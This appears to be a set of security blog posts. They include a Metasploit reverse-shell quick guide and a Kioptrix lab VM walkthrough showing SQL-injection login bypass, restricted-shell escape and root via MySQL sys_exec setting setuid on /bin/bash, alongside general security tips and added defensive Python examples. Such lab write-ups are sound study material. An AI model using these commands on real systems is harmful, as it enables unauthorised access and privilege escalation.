Just In Time, the Brave Browser Becomes My Default

Last night I saw a respected security professional I follow on Twitter mention the Brave web browser, and how good he thought the mobile version is. Brave was started by Mozilla Project co-founder Brendan Eich, and is based on Chromium, the open-source base that Google Chrome is built upon.

Today, I caught wind that Chrome is soon going to prevent you from doing things such as disabling its DRM management feature called Widevine. The problem with this is summarized here:

…a single browser may now require two different DRM plugins to play all DRM content. These plugins have their own security issues, but unlike with the Flash vulnerabilities, security researchers are banned from looking for them, due to Section 1201 of the Digital Millennium Copyright Act (DMCA). That means malicious hackers, who already engage in other criminal activities, may freely take advantage of all the vulnerabilities they find in these DRM plugins before companies discover them on their own.

In short, because of the closed nature of the DMCA, we end users are at risk unnecessarily, and we will soon have no ability to disable this plugin should we wish to do so.

Enter The Brave

Brave offers a browser that works on all desktop platforms (Windows, Mac, Linux) and on mobile. It blocks ads by default, blocks malware, and is lean and fast. Putting user privacy and security at the forefront, along with speed, this thing is a powerhouse: it forces HTTPS on websites and prevents malware-serving advertisement networks from invading your workspace.

But the difference is the paradigm shift in supporting advertisers, as opposed to simply blocking them out completely:

Brave intends to keep 15% of ad revenue for itself, pay content publishers 55%, ad partners 15% and also give 15% to the browser users, who can in turn donate to bloggers and other providers of web content through micropayments.

I have yet to figure out how or if that will work, exactly, and it doesn’t seem to be fully implemented in the browser yet, but it seems like a great way to solve the elephant-in-the-room problem the Internet faces today: how do you earn money and keep users safe at the same time, so that they don’t need to run ad blockers and anti-tracking plugins?

Stay tuned for more info as I learn it, and as I figure out Brave.

Read Now If Your Employees Are Using 123RandomWord As Their Password

Ever since the internet rose up from the mists of nowhere, security breaches have been a source of big news, terrifying news. Whether it is the likes of Yahoo being hacked, or election results being tampered with, hacking scandals seem to be rearing their ugly heads more often than not. We read story after story about security leaks and each one ends with the same paragraph, the same foregone conclusion: businesses and business leaders need to up their game when it comes to protecting the sensitive data they hold. That is the common message from security experts, and yet so many businesses still don’t prepare themselves properly. Until they have been targeted and affected, they don’t take it seriously enough to seek out the weak links in their business or research the most recent trends in threats, and thus they fail to protect themselves and their clients/customers from a breach.

Don’t believe us? Well, the recent State of Risk report concluded that a majority of businesses – big and small – have not invested in a system that will protect, control and track the sensitive data they have been entrusted with. The majority have no system in place, or only a partial one. Trust us, if Yahoo is struggling to hold its defensive line against hackers then, chances are, you are going to struggle too. That’s why it is imperative to invest in security. Put it this way: the average cost incurred by a cyber breach on a small or medium sized business is £325,000.

I thought that would grab your attention.

So what preventative measures can you take? How do you best protect yourself and your customers? How do you make sure you are doing all you can to prevent a security breach? How do you stop your sensitive data getting into the wrong hands? Well, we have conducted thorough interviews with security experts to hear what they say, and have compiled a list of the most common areas of weakness in most businesses.

  1. On The Go Tech

In the early 90s and before, a data hack would mean someone would have to hack into your servers or break into your premises in order to access your sensitive data. But those days are gone, and data theft has been made so much simpler by the rise in mobile technology. Simply put, mobile devices increase your vulnerability and thus increase the risk. Of course, mobile devices are a must-have for all employees these days because they increase flexibility and productivity, and reduce wasted time and resources. However, the more your employees use these devices to share data and access your servers, or fail to change their passwords, the more risk you are at. In fact, mobile breaches account for almost three-quarters of all breaches, a rise that mirrors the rise of the bring your own device (BYOD) policy that so many companies are embracing.

As such, it is imperative that you renew your BYOD policy so that it carefully spells out certain rules and expectations. This will better educate your workforce on the risks. A great way to make this more effective is to relate security breaches at work to the risks they face at home; make it relatable to personal risks like using ATM machines. You should also ensure that you have the capabilities to better monitor mobile devices. This way you will be able to quickly pinpoint any breach or any weakness.

  2. Uneducated Employees

We don’t mean uneducated in terms of schooling, we mean uneducated regarding security, and that means your training program is letting them down. But, yes, all too often your employees are a security risk. It could be that an employee leaves their laptop on a table in Costa as they nip to the bathroom, or a smartphone gets left on the subway, or in a taxi. All of these pose serious threats to your security. But it is not just about exposure outside the office. Too many employees are not educated on the importance of a strong password, what constitutes a strong password, or how often they should change their password. This leaves you exposed on the inside. The same goes for training on what to look out for when it comes to suspicious emails.

Cyber attacks have become more and more sophisticated. Phishing techniques have improved, spear phishing is now in use, unauthorized websites are now able to install malware without the user knowing, and all of these pose a serious threat to both your systems and your data. That is why training is so important, and regular training too, as this will allow you to renew their understanding as different trends arise. A great way to do this is to approach digital learning companies who have experience in this kind of training. This will offer you a cost-effective means of training that is not just interactive and engaging but offers an audit trail too. They will know how to teach your employees about passwords, phishing, keylogging and much more.

  3. Inside Jobs

It is hard to say exactly where an internal attack originates, but it is typically unhappy or disgruntled employees. What’s more, these account for a seriously high number of breaches. Of course, any inside attack will require in-depth knowledge of your IT systems and will require someone to have access to all areas of your network, which is why most inside attacks come from within the IT Department. A disgruntled employee working within IT support can create a huge amount of problems.

Preventing this weakness is a challenge, but it requires mitigating any chance of employees in this sector becoming disgruntled. This is not always possible, so it is crucial you identify all those that have access to all areas of the server; this way you will be able to act quickly should an event happen. Another step should be to terminate access for anyone that no longer works within this capacity as soon as possible.

  4. The Cloud

The most effective way to protect all data that is stored in the cloud is to encrypt any access at ground level. Different experts suggest different encryption software, but all suggestions usually represent the gold standard in this field. We can’t stress enough the importance of investing in this kind of security. Since the cloud first originated, a high proportion of cyber attacks have been made possible by companies not using data level encryption devices to protect data stored up high, so make sure you invest well and invest fast.

  5. Third Parties

There are a few reasons why outsourcing has become more and more attractive. It is cost-effective, it frees up resource time, and it allows experts to address what is becoming a more and more complex area. It could be you outsource the maintenance of your server, or your point of sale system, or a myriad of other things. However, while they may be experts in protecting you, third-party providers sometimes don’t follow best practices themselves. It may be that they use one password to connect to all of their clients, for example, which poses a threat should that password be hacked.

As such, you should always ask as many questions as you possibly can. Make sure they follow the best practices of remote access security, enforce stringent policies for their workforce to uphold, and use sophisticated authentication techniques to ensure unique credentials are required for each user. The other step you must take is to know which third parties you are using and then terminate their access as soon as their contract runs out or as soon as they no longer require access.

Quick Metasploit Guide

These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Prep:
Ensure postgresql is running.

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:
$> msfconsole

Search for exploits related to what you are interested in:
msf> search smb

Or, be more specific:
msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb

Once you find an exploit you want to use, use it:
msf> use exploit/windows/smb_hack

Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:
msf> show options

Set options as needed:

LHOST is the IP address the victim host will connect back to (your Kali VM, for example):

msf> set LHOST 192.168.0.x

RHOST is the IP address of the victim:
msf> set RHOST 192.168.1.x

Default port is 80, but choose one if you wish:
msf> set RPORT 8081

Run the exploit:
msf> exploit

If trying to get a remote shell, be aware that you may already have one even if it looks like nothing is happening. Just try executing a command and see what happens:
ls
dir
pwd
id


Kioptrix Level 1.3 (VM #4) Walkthrough

In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.

Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I’d better start now. Other folks do similar write-ups on the VMs on vulnhub.com, and I’ll see if they will add this to the Kioptrix 1.3 page soon.

Hopefully, someone will find this useful either way.

It should be noted that this VM is known to have at least two possible paths to getting root on the system, and this write-up outlines just one.

Discovery

On my local network, this VM turned up with the IP address of 192.168.0.110.

nmap

Running an nmap scan revealed some open ports and running services:

root@kali:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Poking Around

Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110

No basic SQL injection working from any initial attempts.

Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.

Nikto

Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

dirb and dirsearch

A basic dirb scan turned up a directory:
http://192.168.0.110/john/

I thought that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one:
http://192.168.0.110/robert/

Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.

I also ran dirsearch, a Python tool that also works well for finding directories and files. It found one file:
found file: database.sql

(Note: dirsearch is not included in Kali by default. It requires you to set up Python 3 in a virtual environment to run it.)

enum4linux

Since ports 139 and 445 were open, I went on to try enum4linux:

root@kali:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017

(Pasting only the relevant stuff here.)
 ===================================================== 
| Enumerating Workgroup/Domain on 192.168.0.110 |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

============================================= 
| Nbtstat Information for 192.168.0.110 |
 ============================================= 
Looking up status of 192.168.0.110
 KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
 KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
 KIOPTRIX4 <20> - B <ACTIVE> File Server Service
 ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
 WORKGROUP <1d> - B <ACTIVE> Master Browser
 WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
 WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

============================== 
| Users on 192.168.0.110 |
 ============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

========================================== 
| Share Enumeration on 192.168.0.110 |
 ========================================== 
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server Comment
 --------- -------
 KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master
 --------- -------
 WORKGROUP KIOPTRIX4

[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

===================================================== 
| Password Policy Information for 192.168.0.110 |
 ===================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
 File "/usr/bin/polenum", line 33, in <module>
 from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

enum4linux complete on Thu Feb 9 00:40:51 2017

acccheck

I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.

THC Hydra

You can use Hydra to brute force FTP, SSH, POP3, and SMTP accounts. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:

robert
root
loneferret
john

hydra -L users -P 10_million_password_list_top_100000.txt -t 4 192.168.0.110 ssh -vv

Nothing turned up! Bummer.

database.sql

This was found during discovery with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.

Immediately, the first thing to note is that there’s a username and password shown in the dump file.

john
1234

Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck!
I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.

Perhaps it’d work with SSH or SMB?
Negatory

The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.

After a number of failed attempts and errors by trying various SQL injection strings, using this worked:

Username: john
Password: ' OR 1=1 #

That took me to the User Admin Panel and showed the actual password.
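The bypass above works because the login query is assembled by pasting the form fields straight into SQL. As an added example (not code from the VM or this write-up), here is that kind of query beside a parameterised, hashed-password version; SQLite stands in for the VM's MySQL, the table and rows are constructed, and the payload uses SQLite's `--` comment where MySQL also accepts the `#` used above.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample accounts standing in for the VM's MySQL members table
# (the real dump on the page is not reproduced; these rows are assumptions).
SAMPLE_USERS = [("john", "1234"), ("robert", "s3cret-pw")]
PBKDF2_ROUNDS = 200_000


def _pbkdf2(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_db():
    """In-memory SQLite stand-in. The plaintext table mirrors what the
    write-up found (the admin panel could display the real password); the
    hashed table is what a fixed application would store instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE members_hashed (username TEXT PRIMARY KEY, "
                 "salt BLOB, pw_hash BLOB)")
    for name, pw in SAMPLE_USERS:
        salt = os.urandom(16)
        conn.execute("INSERT INTO members_hashed VALUES (?, ?, ?)",
                     (name, salt, _pbkdf2(pw, salt)))
    return conn


def vulnerable_login(conn, username, password):
    """String-built query like the PHP behind the VM's login form. Whatever
    the user types becomes SQL syntax, so a quote plus a comment marker
    rewrites the WHERE clause. Returns the matched username or None."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        # A syntax error on a login attempt is itself worth alerting on.
        return None
    return row[0] if row else None


def hardened_login(conn, username, password):
    """Parameterised query plus salted PBKDF2 verification. The driver sends
    values separately from the SQL text, so quotes and comment markers stay
    data; only a hash is stored, so no admin page can display a password."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM members_hashed WHERE username=?",
        (username,)).fetchone()
    if row is None:
        return None
    salt, stored = row
    if hmac.compare_digest(stored, _pbkdf2(password, salt)):
        return username
    return None


# SQLite comments with "--"; MySQL also accepts "#", the form used against
# the VM. Either way the trailing quote is commented out and "OR 1=1" makes
# the WHERE clause match every row, so fetchone() returns the first account.
BYPASS_PASSWORD = "' OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_login(db, "john", BYPASS_PASSWORD))
    print("hardened:  ", hardened_login(db, "john", BYPASS_PASSWORD))
```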

That seemed kinda easy. But this is when things got hard, actually.

I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!

Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:

I was warned about trying to cd into the root directory, and getting kicked out if I tried again.

lpath is the same as pwd.

The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile


Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:

Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.

Must break out of the restricted “LigGoat” shell. To the Google!

Searching for “escape restricted shell echo” I found a handy article:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

Trying a number of things, I finally found the right trick, which is to use Python to switch shells:

echo os.system("/bin/bash")

That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337

Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.

MySQL

Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement had the MySQL connection string, including the username and password, which were simply:

user: root
pass: (empty)

That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:

Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:

mysql root pwn server

That led me to a Facebook post, of all things:

https://www.facebook.com/notes/security-training-share/mysql-root-to-system-root-with-lib_mysqludf_sys-for-windows-and-linux/865458806817957/

It described the situation perfectly:

“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a C script (which I was unable to do as user ‘john’ anyway).

Where that article has this line:

select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');

Just do this instead:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:
bash -p

It should drop you into a root shell!
cd /root

cat congrats.txt
Root obtained. Mission complete!
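The final step above works because `chmod u+s /bin/bash` leaves a setuid shell on disk, which is exactly the kind of artifact a periodic audit should catch. As an added example (not part of this write-up), here is a small setuid/setgid drift check: it walks a tree, compares what it finds against a recorded baseline, and flags any shell or interpreter carrying the bit. The baseline paths below are an assumption; a real one is recorded from a known-good install.

```python
import os
import stat

# Shells and interpreters that should never carry a setuid bit: a setuid
# copy of any of these is an instant root shell (bash -p keeps the euid).
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ksh", "python", "perl", "ruby"}

# Constructed baseline of setuid paths that are normal on a Debian/Ubuntu
# host (assumption for this example; record your own after provisioning).
BASELINE = {"/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/passwd",
            "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/gpasswd"}


def scan_tree(root):
    """Yield (path, st_mode) for every regular file under root. Symlinks are
    not followed and unreadable entries are skipped, so an unprivileged
    account can still audit the parts of the tree it can see."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode


def classify(entries, baseline=BASELINE):
    """Split setuid/setgid files into those not in the baseline ('unexpected')
    and those whose basename is a shell or interpreter ('shells'). A file can
    appear in both lists; /bin/bash after the step above would."""
    unexpected, shells = [], []
    for path, mode in entries:
        if not mode & (stat.S_ISUID | stat.S_ISGID):
            continue
        base = os.path.basename(path)
        # Fold versioned names such as python3.8 onto the interpreter name.
        if base in SHELL_NAMES or base.rstrip("0123456789.") in SHELL_NAMES:
            shells.append(path)
        if path not in baseline:
            unexpected.append(path)
    return {"unexpected": sorted(unexpected), "shells": sorted(shells)}


def audit(root="/", baseline=BASELINE):
    """Scan a live tree and classify the result."""
    return classify(scan_tree(root), baseline)


if __name__ == "__main__":
    report = audit("/")
    for kind in ("shells", "unexpected"):
        for path in report[kind]:
            print(f"{kind}: {path}")
```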


Let’s Revisit: Sending Mass Emails The Right Way

The concept of sending an email to multiple people the right way seems to have eluded the populace as a whole lately. I’m looking at you, schoolteachers, soccer coaches, and party invitation senders. I write to you today because, in recent months, it seems I’ve been included on more and more emails where I’m one of 50 people whose email address is awkwardly stuffed into the CC: field of the email you sent, right there with all the others for everyone in the list to see. I even got an email from the manager of the local Sears store I had recently purchased an appliance from, that got sent to all the people who had bought something there recently, and everyone’s name and address were easily viewable in the CC field.

The problem here is that you are being inconsiderate towards peoples’ privacy, and you are sending around a large list of real email addresses to possibly be harvested by spammers.

There is a way to do this that protects peoples’ privacy, doesn’t annoy the nerds and geeks in your email list, and makes you look like you know what you are doing. What trifecta could be better than that?

The easiest way to do this is by using the BCC: field instead of the CC: field. BCC stands for “Blind carbon copy,” which means that any email address entered in it will not show up to the recipients of the email. The CC: field does show them, so don’t use it.

The trick is that you should enter your own email address in the To: field of the email, then enter the long list of room parents or party invitees in the BCC field. That’s it! Now you too can look cool.
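The same To:-yourself, everyone-in-BCC recipe, as an added example in Python (not from this post): the recipient list goes only into the SMTP envelope, the delivered headers carry just the sender, and a pre-send check confirms no recipient address leaked into the headers. The CC variant is included only to show what the check catches; all addresses are constructed.

```python
import smtplib
from email.message import EmailMessage


def build_bulk_message(sender, recipients, subject, body):
    """Return (message, envelope_recipients). Recipients live only in the SMTP
    envelope; the headers everyone receives show just the sender in To:.
    No Bcc header is set at all, since some clients and libraries would
    otherwise serialise it into the delivered message."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = sender          # address it to yourself, as the post advises
    msg["Subject"] = subject
    msg.set_content(body)
    envelope = sorted(set(recipients))   # de-duplicated, deterministic order
    return msg, envelope


def build_cc_message(sender, recipients, subject, body):
    """The wrong way: every address in CC, visible to every recipient."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = sender
    msg["Cc"] = ", ".join(recipients)
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


def leaked_addresses(msg, recipients):
    """Pre-send check: which recipient addresses appear in any header that
    will be delivered? For a correctly built message this is empty."""
    header_text = " ".join(str(v) for v in msg.values()).lower()
    return [r for r in recipients if r.lower() in header_text]


def send_bulk(host, sender, recipients, subject, body, port=25):
    """Build, verify, then hand the explicit envelope list to the server."""
    msg, envelope = build_bulk_message(sender, recipients, subject, body)
    leaks = leaked_addresses(msg, envelope)
    if leaks:
        raise ValueError(f"recipient addresses exposed in headers: {leaks}")
    with smtplib.SMTP(host, port) as smtp:
        # Passing to_addrs explicitly means send_message never has to read
        # (or strip) a Bcc header; the message has none.
        smtp.send_message(msg, from_addr=sender, to_addrs=envelope)
```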

There are some detailed instructions, with pictures, available here, in case you need more info.

WordPress Security from WordCamp Asheville 2016

One of the coolest things about WordCamp is that they post videos of each talk and presentation on WordPress.tv for viewing afterwards. It gives you the chance to see all the great presentations you may have missed, or to revisit the ones you attended.

With so many WordCamps happening all over the world, it is a great resource.

My presentation from WordCamp Asheville 2016, titled WordPress Security: Don’t Be a Target, is now live on WordPress.tv.